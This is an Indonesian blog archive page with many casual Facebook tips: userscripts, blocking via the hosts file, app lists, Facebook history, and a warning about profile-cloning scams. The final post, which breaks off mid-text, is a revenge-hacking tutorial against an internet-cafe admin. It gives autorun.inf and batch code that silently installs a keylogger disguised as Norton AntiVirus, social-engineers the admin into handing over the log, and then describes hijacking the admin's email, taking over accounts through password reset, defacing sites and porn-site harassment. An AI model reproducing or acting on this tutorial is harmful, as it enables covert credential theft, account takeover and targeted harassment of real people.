Blog Kumpulan Artikelku

Membuat Efek Keren di Template Facebook

| Minggu, 31 Mei 2009
Tips Membuat Efek Keren di Template Facebook


Ikuti langkah berikut :
1. Masuk dulu di account Facebook anda.
2. Klik dimana saja di halaman facebook yang sudah terbuka.
3. Nah tolong ikuti perintah ini sesuai urutan dengan cepat. Tekan tombol pada keboard anda berurutan. Atas-atas-bawah-bawah-kiri-kanan-kiri-kanan-B-A-Enter.
4. Tunggu beberapa saat sebelum efeknya muncul.
5. Coba gerakkan mouse anda, apakah ada perbedaan yang muncul? Kalo belum ulangi lagi instruksinya.

---------------------------------evolution---------------------------------
Read More to.. Membuat Efek Keren di Template Facebook

Menghilangkan Iklan di Facebook

|
Temen-temen semua pasti taw,kenal,daftar,punya facebook masing”,,n kita lyat suka banyak sekali iklan-ikaln yang muncul disisi kanan facebook anda. Mungkin ada yang merasa nyaman dan ada juga yang ngerasa kuran nyaman alias (ngagokan).. Nah bagi anda yang merasa kurang nyaman dengan kehadiran iklan di facebook anda, ada cara/tips menghilangkan iklan di facebook anda.

Emang sih iklan adalah salah satu sumber penghasilan suatu perusahaan penyedia layanan internet,tap klo udah menggangu ya sudah kita sikat langsung ja nih iklan-iklan nya,hehe . .

Ada banyak Facebook Code yang bisa temen-temen pakai untuk ngilangin iklan-iklan Facebook, satu yang terbaik adalah Facebook Code “Remove All Facebook Ads” yang dibuat oleh Tidalwav. Cukup temen-temen instal Remove All Facebook Ads, di komputer kalian maka temen-temen akan terbebas lepas dari iklan-iklan yang ada di Facebook dan trus lebihnya temen-temen bisa lebih cepat mengakses Facebook karena ketidakhadiran/absennya iklan-iklan tersebut. (haha kasian juga sich).

Kita mulai dengan menginstal code Remove All Facebook Ads, silahkan arahkan browser kalian keInstal Remove All Facebook Adssetelah itu temen-temen klik tombol INSTAL seperti yang terlihat pada gambar di bawah ini.

Begitu temen-temen klik tombol INSTAL akan hadir Pop up Windows GreaseMonkey Instal;ation yang konfirmasi about proses instalasi script, temen-temen tinggal pilih sajah Instal.
Catatan buat kalian : Sebelum instal code Remove All Facebook Ads, don’t 4get pastikan di komputer kalian udah terinstal Add-On GreaseMonkey dan penjelasan lengkap about GreaseMonkey bisa kalian baca di
Mempercantik Facebook dengan Facebook Code.


---------------------------------evolution---------------------------------
Read More to.. Menghilangkan Iklan di Facebook

MERUBAH TAMPILAN FACEBOOK

|
sebelum


sesudah



to the point aja broww!!

Untuk mempergunakan script perubah warna Facebook cukup anda download dan instal Script Facebook Color Changer, namun sebelumnya pastikan dulu Greasemonkey telah terinstal dengan baik di komputer anda, dan anda meng-Enable-kan Greasemonkey ini. Keterangan tentang Greasemonkey bisa anda lihat di Greasemonkey berikut ini.

Setelah Script Facebook Color Changer terinstal di komputer anda, sekarang waktunya anda untuk mengakses Facebook. Setelah itu lihat Ikon Greasemonkey di pojok kanan browser anda, klik kanan dan kemudian pilih Userscript Commands dan klik Costumise Facebook Colours. Akan muncul Windows untuk menentukan warna pilihan untuk Facebook anda. Pilihlah warna sesuai dengan kesukaan anda.
Kini, anda pun akan lebih bersemangat dalam mengakses Facebook dan tidak merasa bosan atau jemu meskipun membuka selama 64 jam nonstop, dengan warna tampilan standar Facebook yang selalu itu-itu saja dari hari ke hari, karena kini anda bisa merubah warna tampilan Facebook sesuai dengan keinginan dan mood anda!

keep your smile broWW!!


---------------------------------evolution---------------------------------
Read More to.. MERUBAH TAMPILAN FACEBOOK

Ngeblokir Orang Resek

|
cara untuk memblokir orang-orang yang menggangu:

1. Pilih settings > Privacy settings
2. Dibagian bawah terdapat kotak dan silakan masukan nama orang yang akan diblokir (yang udah menjadi teman/bukan teman)
block friends
Setelah melakukan hal ini maka orang yang diblokir tidak akan pernah menemukan facebook kita kecuali kalo tu Resekker buat facebook baru..


---------------------------------evolution---------------------------------
Read More to.. Ngeblokir Orang Resek

NGEBLOCKING FACEBOOK

|
Tidak semua orang suka dengan facebook. Banyak kantor juga memblok situs rekaan Mark Zuckerberg ini. Alasannya? Ya, apalagi kalau bukan didakwa menurunkan produktivitas.

Tentu saja semua hal di dunia ini ada sisi baik dan buruknya. Jika anda menganggap facebook tak berguna pilihannya adalah mengucapkan selamat tinggal saat ini juga. Saya juga baca di blogosphere mereka yang sukarela meninggalkan facebook dengan dalih situs itu berbau yahudi.

Ya, apa pun alasannya anda bisa memblok facebook dengan salah satu cara berikut:

Silakan buka folder berikut di komputer anda.

C:\WINDOWS\system32\drivers\etc\hosts

Lalu tambahkan baris ini di dalamnya:

0.0.0.0 www.facebook.com

Nah, sekarang jika anda memasukkan www.facebook.com di browser maka browser akan bilang “connection close by remote server”.

Tentu saja anda sewaktu-waktu dapat mengembalikan situs tersebut secara sukarela agar bisa diakses dengan cara menghilangkan baris tadi.

Tapi, cara ini masih cukup ampuh untuk membatasi akses anak-anak agar kagak lupa belajar atau agar istri/suami anda tidak lupa tugasnya di rumah hanya gara-gara facebook.


---------------------------------evolution---------------------------------
Read More to.. NGEBLOCKING FACEBOOK

10 Tools dan Aplikasi Facebook Yang Menarik

|
10 Tools dan Aplikasi Facebook Yang Menarik

Facebook mempunyai anggota dari hari ke hari bertambah banyak dikarenakan facebook membebaskan penggunanya menggunakan aplikasi bahkan membuat sendiri aplikasi tersebut. Facebook mempunyai banyak tools dan Add-Ons yang dapat membuat anda nyaman jika bermain dengan facebook.
Disini ada 10 Tools dan Aplikasi Facebook yang mungkin dapat membuat anda nyaman bermain dengan facebook dan dapat pula mempermudah anda dalam mengelola facebook anda.


1. Facebook Toolbar http://developers.facebook.com/toolbar/
Facebook Toolbar memiliki kotak pencarian, pemberitahuan, sebuah ikon yang dapat digunakan untuk memeriksa gambar teman-teman anda dan statusnya.
2. Simple Photo Uploader
http://code.google.com/p/fb-photo-uploader/wiki/FacebookOverview
Simple Photo Uploader adalah sebuah aplikasi desktop untuk facebook yang dapat membantu anda meng-upload foto dengan mudah.
Simple Photo Uploader juga memberikan kemampuan untuk menandai foto.
3. FacePad (https://addons.mozilla.org/en-US/firefox/addon/8442
Facepad adalah add-ons firefox yang memungkinkan anda men-download teman facebook dan acara album.

4. Advanced Wall
http://www.facebook.com/apps/application.php?id=3118555174)
Daripada memposting pesan melalui pilihan default, Advanced Wall dapat memposting foto, gambar, graffiti, video, flash, mengubah ukuran teks dan warna, bersama dengan banyak hal-hal lain yang sederhana dengan menggunakan editor WYSIWYG.
5. Facebook Mobile
http://www.facebook.com/apps/application.php?id=3118555174)
Facebook Mobile adalah aplikasi yang digunakan oleh banyak pengguna.
Memberikan anda kemampuan untuk meng-upload foto dan catatan dari kamera telepon langsung ke Facebook.
6. ScrapBoy
http://www.scrapboy.com/en/downloads/
ScrapBoy adalah sebuah aplikasi desktop untuk aplikasi facebook yang dapat digunakan untuk melakukan hampir segala sesuatu yang berkaitan dengan facebook.
Dengan fitur seperti menulis posting dinding, melihat foto atau Facebook chatting, melihat ‘dinding’ beberapa teman-teman, album foto dan jendela obrolan pada saat yang sama dan yang lainnya.
7. Graffiti http://apps.facebook.com/graffitiwall/
Graffiti adalah aplikasi berbasis facebook yang dapat digunakan untuk menggambar pada dinding teman-teman anda.
8. Task Master
http://apps.new.facebook.com/todolist/
Task Master memungkinkan Anda mengelola tugas-tugas anda di facebook secara lebih efisien.
9. Friends Organizer
http://apps.facebook.com/friendsorganizer/
Friends Organizer adalah nifty aplikasi yang dapat digunakan untuk mengurutkan daftar kontak Anda ke dalam grup, seperti schoolfriends, teman-teman kerja, teman-teman media sosial dll.
10. Last.Fm Music http://apps.facebook.com/lastfmmusic/
Last.Fm Music adalah aplikasi musik untuk semua orang-orang yang suka musik dan tentunya Last.fm.
Anda dapat membandingkan musik Anda dengan teman-teman, mendengarkan lagu mereka, dan menempatkan kotak dari artis dan album foto pada profil Anda.


---------------------------------evolution---------------------------------
Read More to.. 10 Tools dan Aplikasi Facebook Yang Menarik

Chating Facebook Seperti YM

|


Software yg co'k wad penggila facebook seperti Qm...
gak sulit,tinggal Download trus install and login kayak di Facebook biasanya Qm udah bisa chating terasa di YM...
installnya jg g' sulit tinggal next next doang.............
OK brow...??

klo lom coba lom merasakan,za gk?


---------------------------------evolution---------------------------------
Read More to.. Chating Facebook Seperti YM

ADA APA DENGAN FACEBOOK...

|

Di Indonesia pamor Facebook (FB) memang rada-rada kalah bila dibandingkan dengan Friendster (FS). Tapi itu bukan halangan untuk anda untuk menjadi member Facebook. Apalagi kini Facebook sedikit demi sedikit mulai mendapat perhatian lebih di Indonesia. Anda bisa lihat sendiri sebuah acara di salah satu televisi swasta nasional mempergunakan Facebook sebagai sarana untuk menyampaikan saran dan opini penontonnya. Itu menandakan bahwa Facebook memang layak untuk anda jadikan sebagai rumah virtual di web.

Facebook adalah salah satu dari sekian banyak Online Social Networking atau Situs Jejaring Sosial yang ada di jagad web. Bila anda sebelumnya telah mengenal MySpace atau Friendster, maka Facebook pun tak jauh berbeda seperti kedua Online Social Networking tersebut. Facebook pertama kali hadir pada bulan Februari 2004 dengan Mark Zuckerberg sebagai pendirinya. Di awal-awal berdirinya, Facebook hanya ditujukan untuk kalangan Mahasiswa Universitas Harvard. Baru di tahun 2005 Facebook membuka keanggotaan untuk kalangan anak sekolah. Setahun kemudian tepatnya tahun 2006 Facebook membuka keanggotaan secara universal alias siapa saja, dari belahan bumi manapun , orang bisa bergabung dengan Facebook



Fitur-fitur menarik yang bisa anda dapatkan di Facebook antara lain :

* Anda bisa membuat profile sesuai dengan keinginan dan kepribadian anda, dan memperlihatkan kepada orang lain siapa anda melalui widget-widget yang bisa anda atur sesuai selera.
* Add Friends dan memberikan comment pada member lain di Facebook
* Join group, dan melakukan diskusi
* Search Friends
* Dan fitur-fitur lainnya



Kenapa Harus Bergabung dengan Facebook?

Alasannya sederhana untuk have fun. Selain itu Facebook merupakan Online Social Networking dengan perkembangan yang paling pesat di jagad web dibandingkan dengan yang lainnya, karena itu Facebook menjadi tempat yang tepat untuk anda bisa terus menjalin hubungan silaturahmi dan komunikasi dengan teman maupun keluarga anda.

Satu hal lagi, saat ini banyak sekali artis, bintang film, musisi bahkan politisi-politisi terkenal yang mempergunakan Facebook sebagai sarana untuk lebih mendekatkan dirinya dengan para Fans setia di seluruh dunia. Jadi, bila anda ingin lebih mendekatkan diri dengan tokoh, artis atau musisi favorit anda, maka Facebook adalah tempat yang cocok untuk anda jadikan pilihan sebagai rumah virtual anda di jagad web.


---------------------------------evolution---------------------------------
Read More to.. ADA APA DENGAN FACEBOOK...

Tips Registrasi facebook

|
Facebook dari hari ke hari semakin banyak anggota dan peminatnya, ini menjadikan Facebook menjadi online social networking terbesar yang ada di jagad web. Ini juga yang kemudian menjadikan Facebook menjadi alat yang sangat tepat untuk kita bisa tetap menjalin hubungan silaturahmi maupun komunikasi dengan teman-teman maupun keluarga.

Inilah saatnya anda mempunyai sebuah Profile di Facebook, jangan sampai teman-teman anda yang telah sejak dulu bergabung dengan Facebook merasa heran, kenapa anda tidak mempunyai profile di Facebook? Selain itu untuk bergabung dengan Facebook tidak dikenakan biaya, alias gratis. Jadi tidak ada alasan, untuk tidak bergabung dengan Facebook.

Berikut ini adalah tutorial singkat untuk membuat sebuah Profile di Facebook, Let’s check this out!

Langkah pertama adalah arahkan browser anda ke website Facebook. Di halaman pertama saja telah disediakan Formulir untuk bergabung (Sign Up) dengan Facebook. Anda bisa lihat sendiri bahwa Facebook itu “It’s Free and anyone can join” jadi siapapun anda, dimanapun anda berada bisa bergabung tanpa kecuali. Isilah formulir sesuai dengan data yang diperlukan. Mulai Full Name (Nama Lengkap) isilah sesuai dengan nama depan dan belakang anda, sampai kepada Jenis kelamin dan tempat tanggal lahir anda dan Password yang nantinya akan digunakan untuk anda Login ke Facebook. Pada bagian Your Email, isilah dengan valid email yang anda miliki (jangan mempergunakan email asal-asalan). Setelah semua terisi, tinggal anda klik tombol Sign Up yang berwarna hijau.Langkah kedua, Anda masukkan dua buah kata dari Security Code yang tertera pada box yang disediakan. Setelah sesuai, lalu klik tombol Sign Up yang berwarna Hijau.

Confirm Your Email Address.


Sekarang saatnya anda mengecek email anda, dan meng-klik link konfirmasi pada email yang dikirim oleh Facebook ke email anda untuk proses konfirmasi. Setelah proses konfirmasi dilakukan anda akan dihadapkan pada 3 (tiga) langkah yang berisi beberapa pertanyaan, anda bisa mengisinya atau bila anda ingin langsung menuju Profile Anda, anda bisa Men-Skip langkah-langkah tersebut.

Saatnya mengedit Profile anda, dan untuk memulainya anda tinggal klik “View and edit your profile”
Ada empat bagian yang harus anda edit pada tab INFO sesuai dengan biodata diri anda yaitu Basic Information, Personal Information, Contact Information dan Education and Work. Isilah sesuai dengan kebutuhan.

Basic Information, berisi data diri anda mulai dari tempat tanggal lahir, kota tempat anda berada, sampai kepada status anda saat ini. Untuk hari kelahiran, bila anda tidak ingin orang tahu kapan anda lahir dan ulang tahun, sebaiknya anda pilih “don’t show my birthday in my profile”. Setelah mengeditnya klik tombol Save Changes.

Untuk Personal Information, isilah sesuai dengan kebutuhan anda. Dari buku favorit, movie, kesukaan sampai About Me yang menggambarkan apa dan bagaimana anda itu.

Untuk Contact Information dan Education and Work anda bisa mengisinya sesuai dengan data-data yang diminta oleh Facebook.

Setelah selesai mengedit beberapa informasi tentang diri anda, jangan lupa mengklik tombol Done Editing biar hasil editing anda tersimpan pada profile anda. Perlu diingat, kapanpun bila diperlukan anda bisa mengedit informasi profile diri anda ini.

Biar lebih lengkap, anda juga bisa langsung meng-Upload photo anda untuk dipajang di profile Facebook anda. Caranya cukup anda klik link Upload a Profile Picture.
Itulah beberapa langkah awal untuk membuat sebuah profile di Facebook. Kini saatnya anda menunjukkan pada dunia bahwa anda telah menjadi member Facebook!

---------------------------------evolution---------------------------------
Read More to.. Tips Registrasi facebook

5 Langkah Membuat Facebook Jadi Asyik

|

Penemu Facebook Mark Zuckerberg menyebut konsep situsnya sebagai sebuah social graph bukan social networking. Menurutnya, pertemanan itu sudah ada dalam kehidupan nyata, karena itu facebook lebih berfungsi memfasilitasi agar pertukaran informasi tambah mudah dan nyaman.

Nah, berikut 5 cara agar nongkrongin facebook menjadi lebih asyik.

Pertama, Buatlah event sesering mungkin dengan teman-teman. Pemakai facebook pada awalnya adalah kalangan mahasiswa di kampus-kampus AS. Facebook digemari mahasiswa karena menjadi alat untuk mengorganisir sejumlah kegiatan terutama pesta-pesta. Di Indonesia, kabarnya acara reunian begitu menjamur setelah banyak orang ketemu kawan-kawan lama mereka di facebook.

Kedua, nyatakan cinta dengan facebook.Facebook menyediakan fasilitas untuk menjelaskan relationship cinta seseorang. Status

ini begitu penting bagi facebooker apakah dia sudah married, single, atau baru putus cinta (complicated). Di negeri asalnya, facebook begitu digemari karena dipakai mahasiswa untuk mengajak dating teman cewek/cowoknya. Nah, untuk sekedar mengungkapkan rasa cinta tersedia begitu banyak facebook application yang kebanyakan dalam bentuk gift.

Ketiga, buatlah grup untuk membangun komunitas di facebook. Fasilitas ini begitu powerful terutama bagi mereka yang sudah punya jaringan di dunia nyata. Tapi, bisa juga sebaliknya. Anda bisa memulai sebuah komunitas dan mencari pengikut lewat facebook. Asyik bukan?

Keempat, buatlah halaman di facebook. Fasilitas ini adalah panggung yang disediakan facebook agar fans berjumpa dengan para idola. Merek-merek terkenal mulai dari orang hingga produk ramai-ramai membuat “page” untuk menyapa penggemarnya. Hingga detik ini brand yang memiliki fans terbanyak adalah Coca Cola di mana lebih dari 3 juta orang menjadi fansnya. Untungnya siapa saja bebas membuat halaman di facebook termasuk Coca Cola tadi yang dibuat bukan oleh perusahaannya melainkan oleh 2 warga AS.

Kelima, upload foto lebih sering. Facebook sekarang menjadi situs paling populer dalam untuk upload foto. Sebabnya tentu saja karena setiap foto itu akan mudah ditemukan teman-teman dalam satu jaringan, dikomentari, dan ditag. Tak ada situs foto yang seinteraktif ini.

boleh dicoba broww!!

---------------------------------evolution---------------------------------
Read More to.. 5 Langkah Membuat Facebook Jadi Asyik

10 TANDA PENGGILA FACEBOOK

|

Sejak diluncurkan 4 Februari 2004, situs jejaring sosial facebook telah memikat jutaan hati penggunanya. Mulai siswa sekolah, ibu rumah tangga, selebriti, hingga politisi, kini memiliki jejaring sosial facebook. Berkat kemajuan teknologi, kini kita pun dapat memperbarui status facebook dan mengomentari foto setiap saat. Rasanya, kini ada yang kurang bila setiap hari tidak masuk ke situs ini dan melakukan aktivitas “facebook-ing”.

Manfaat facebook memang tak cuma untuk pergaulan, tapi juga sarana komunikasi, mencari pekerjaan, hingga kampanye. Sayangnya kesibukan mengutak-atik facebook membuat banyak orang kini lebih banyak menghabiskan waktu ketimbang bekerja. Tak heran bila banyak perusahaan yang mulai menerapkan kebijakan mengeblok situs ini di kantor. Sebuah penelitian juga menunjukkan adanya kaitan antara facebook dengan meningkatnya angka perceraian di Inggris dan Australia.

Nah, apakah Anda termasuk dalam orang yang hidupnya mulai dikendalikan facebook? Simak 10 tanda berikut ini.

1. Facebook telah menjadi homepage internet di komputer atau laptop Anda.
2. Anda mengubah status lebih dari dua kali sehari dan rajin mengomentari perubahan status teman.
3. Daftar teman Anda sudah melebihi angka 500 orang dan setengahnya hampir tidak dikenal.
4. Bila sedang jauh dari komputer, Anda mencek facebook melalui BlackBerry, iPhone, atau ponsel pintar lainnya.
5. Rajin membaca profil teman lebih dari dua kali sehari, meski ia tidak mengirimkan pesan atau men-tag Anda di fotonya.
6. Anda mengubah profile foto lebih dari 12 kali.
7. Anda membaca artikel ini sambil mencek facebook.
8. Anda membersihkan “wall” agar terlihat sudah lama tidak masuk ke fb.
9. Anda menjadi anggota lebih dari 10 grup dan merespons setiap undangan meski sebenarnya tak berminat.
10. Anda mengubah status hubungan hanya untuk meningkatkan popularitas di facebook.

sumber: koran Kompas

---------------------------------evolution---------------------------------
Read More to.. 10 TANDA PENGGILA FACEBOOK

FACEBOOK HACK

|

Facebook akhir-akhir ini mulai digandrungi oleh kaula muda. Entah mengapa semakin banyak yang beralih ke FaceBook, mungkin karena fasilitas di FaceBook lebih lengkap, atau mungkin juga karena faktor keamanan account di situs-situs pertemanan lainnya seperti friendster yang sangat mudah untuk di hack.

Mungkin sebagian orang beranggapan FaceBook lebih aman daripada Friendster, tidak juga, karena pada dasarnya setiap website pasti mempunyai celah, namun semua itu tergantung pihak pembangun website tersebut cepat menaggapi atau tidak. Jika begitu ditemukan lubang baru segera di tutup, saya rasa tidak seberapa masalah. Yang penting memang pemeliharaannya.

Jika anda sering membaca majalah atau situs atau forum yang membicarakan pencurian data maka anda biasanya anda akan diingatkan agar tidak menerima friend request dari orang yang tidak anda kenal atau mencurigakan, karena dengan menjadi teman facebook kita maka data2 kita akan dapat terlihat mereka namun hal itu tidak berlaku sekarang. Karena mereka mempunyai trik baru.

Trik barunya adalah menggunakan teman anda. Jadi sang pencuri akan semirip mungkin dengan profile teman anda, dan mengajukan request sebagai teman anda. Dan tentu saja disini anda tidak akan curiga sedikitpun kalau sebenarnya dia bukan teman anda. Dan anda akan dengan senang hati melakukan approve untuk semua permintaan dia. Lalu bagaimana cara mereka mendapatkan data teman anda ? Mereka melihat teman anda melalui profile yang anda miliki, lalu menconteknya habis-habisan. Bisa saja dengan mengatakan bahwa itu account barunya, atau bisa juga dia mengatakan kalau accountnya yang lama dicuri, atau mungkin juga dia tidak mengatakan apa-apa karena anda juga pasti tidak ingat siapa saja teman anda di FaceBook.

Metode ini kurang populer di kalangan hacker friendster, tapi Friendster sangat mungkin sekali kecurian dengan metode seperti ini.

Mungkin langkah preventif yang harus diambil oleh Friendster, FaceBook, dan MySpace adalah mendeteksi adanya duplicate content. Jadi kalau ada profile yang kembar tidak akan disetujui.

Sedangkan untuk pengguna, hanya bisa berhati-hati saja. Jika ingin aman tanyakan pertanyaan pribadi yang bisa dijawab hanya oleh teman anda.

Kalau bagi saya FaceBook hanya sekedar identitas saja, meksipun dicuri gak seberapa peduli, karena selain password setiap accountku berbeda semua dan unik, kalaupun disalah gunakan teman-temanku pasti sudah tau sifatku sehingga dia juga pasti sudah tau kalau aku tidak mungkin mengirim yang aneh-aneh.

So, kalau account anda dicuri, jangan terlalu diambil hati, toh fungsi website itu kan sebenarnya untuk hiburan, jadi kenapa malah membuat anda stress ? Selain itu kalaupun dijual tidak akan laku, kecuali kalau anda merupakan orang terkenal.


---------------------------------evolution---------------------------------
Read More to.. FACEBOOK HACK

Tentang Facebook

|


Facebook adalah website jaringan sosial dimana para pengguna dapat bergabung dalam komunitas seperti kota, kerja, sekolah, dan daerah untuk melakukan koneksi dan berinteraksi dengan orang lain. Orang juga dapat menambahkan teman-teman mereka, mengirim pesan, dan memperbarui profil pribadi agar orang lain dapat melihat tentang dirinya.

Facebook didirikan oleh Mark Zuckerberg, seorang lulusan Harvard dan mantan murid Ardsley High School diluncurankan pertama kali pada 4 februari dan awalnya hanya untuk siswa Harvard College. Dalam dua bulan selanjutnya, keanggotaannya diperluas ke sekolah lain di wilayah Boston (Boston College, Boston University, MIT, Tufts), Rochester, Stanford, NYU, Northwestern, dan semua sekolah yang termasuk dalam Ivy League.

Banyak perguruan tinggi lain yang selanjutnya ditambahkan berturut-turut dalam kurun waktu satu tahun setelah peluncurannya. Akhirnya, orang-orang yang memiliki alamat email universitas (seperti .edu, .ac.uk, dll) dari seluruh dunia dapat juga bergabung dengan situs ini.

Selanjutnya Facebook dikembangkan pula jaringan untuk sekolah-sekolah tingkat atas dan beberapa perusahaan besar. Sejak 11 September 2006, orang dengan dengan alamat email apa pun dapat mendaftar di Facebook. Pengguna dapat memilih untuk bergabung dengan satu atau lebih jaringan yang tersedia, seperti berdasarkan sekolah tingkat atas, tempat kerja, atau wilayah geografis.

Facebook menemui masalah dalam beberapa tahun terakhir seperti pemblokiran pada negara Suriah, Iran dan beberapa tempat kerja agar para pekerja tidak menyalahgunakan waktu kerjanya untuk membuka Facebook. Dan masalah tentang tuduhan bahwa Zuckerber mencuri kode program dari teman-temanya untuk membuat Facebook.

Facebook juga pernah ditawar oleh yahoo senilai $ 1 miliar dan kemudian oleh seorang anggota dewan Facebook, menunjukkan bahwa Facebook internal valuation adalah sekitar $ 8 miliar berdasarkan proyeksi pendapatan sebesar $ 1 miliar pada tahun 2015.

Peringkat Facebook saat saya tulis artikel ini menempati urutan ke 6 situs yang paling banyak di akses di indonesia dan urutan ke 5 untuk seluruh dunia.

Facebook office


Berikut data mengenai facebook:

Founded : Cambridge, Massachusetts(February 4, 2004)

Headquarters : Palo Alto, CaliforniaDublin, Ireland (international headquarters for Europe, Africa, Middle East)

Key people : Mark Zuckerberg (Founder and CEO), Dustin Moskovitz (Co-founder), Sheryl Sandberg (COO), Matt Cohler (VP of Product Management), ChrisHughes (Co-founder)

Revenue : 300 million USD (2008 est.)

Net income : 47.4 million USD (2007 est.)

Employees : 700 (November 2008)

Website : facebook.com

Type of site : Social network service

Advertising : Banner ads, Referral marketing

Registration : Required

Available in : Bulgarian, Catalan, Chinese (simplified), Chinese (Hong Kong), Chinese (Taiwan), Croatian, Czech, Danish, Dutch, English (American),English (British), English (Pirate), Filipino, Finnish, French, German, Greek, Hungarian, Indonesian, Irish, Italian, Japanese, Korean, Malay, Norwegian, (bokmål), Polish, Portuguese (Brazilian), Portuguese (European), Romanian, Russian, Serbian, Slovene, Spanish (Castilian), Swedish, Thai, Turkish,Vietnamese, Welsh.

---------------------------------evolution---------------------------------
Read More to.. Tentang Facebook

Pembalasan Sang Admin

|
|---[Table of Contents

1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup


1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para
newbie.

Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan
melarang user untuk melakukan segala bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate patch sehingga
exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi"rongsokan"

tak berguna.

Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang
100% secure.


2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin.
Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan
orang... mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net
kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah -
langkah berikut:

---[1 Bukalah Notepad kemudian ketik baris script berikut:

[autorun]
open=nav.bat

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].

---[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:

@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].

---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.

---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer
user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer
nomor blablabla."

Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf
akan memproses file nav.bat ---> file nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden.

Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)

Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi - lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis
menang togel.

Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows
sang admin? Ikuti langkah-langkah pada serangan kedua.


3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan
pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan
Error yang muncul, file navw32.dll yang berada di directory windows hilang.
File tersebut beratribut hidden. Tolong doong copykan dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya.."

Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All
files pada Folder Options dan mengcopy-kan file navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file system, namun file
hasil rekaman keyloger.

Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik
2x pada file lalu ketika muncul kotak dialog open with, klik opsi select
program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.


4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah
warnet yang buka 24 jam.

Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar
dengan email tersebut. Subscribe sebanyak-banyaknya.

Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan
mengirimkan password via email. So, setelah dapat semuanya... heheh... DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah
password apapun!!

Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs - situs porno dan
postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya
jika milis tersebut berbahasa Indonesia:

Dear all..
